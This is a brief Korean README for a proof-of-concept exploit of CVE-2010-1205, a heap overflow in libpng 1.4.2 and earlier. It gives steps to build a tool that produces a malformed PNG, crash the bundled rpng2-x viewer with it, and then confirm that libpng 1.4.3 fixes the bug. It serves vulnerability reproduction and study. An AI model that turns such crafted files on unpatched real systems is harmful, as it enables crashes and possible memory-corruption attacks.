
libpng의 버퍼 오버플로 샘플 익스플로잇
CVE-2010-1205 취약점을 이용한 libpng (<=1.4.2) 샘플 익스플로잇
gregbook - libpng 소스와 함께 배포되는 샘플 프로그램 세트
generate - libpng으로 파일을 읽을 때 힙 오버플로우를 유발하는 악성 png 파일 생성
재현 단계: ./build.sh # 모든 라이브러리 및 실행 파일 빌드. gregbook/rpng2-x는 libpng-1.4.2 (버그 있음)와 링크됨 ./generate/build/generate # xploit.png 생성 - 변조된 png 파일 cd gregbook/ ./rpng2-x ../xploit.png # libpng을 사용하여 png 파일을 표시하는 예제 실행. Segmentation fault로 종료.
수정된 libpng 버전(1.4.3)으로 실행하는 단계: in gregbook/Makefile edit line 33: PNGDIR = ../libpng-1.4.3 in gregbook directory run: make clean && make ./rpng2-x ../xploit.png # png 파일이 있는 창 열기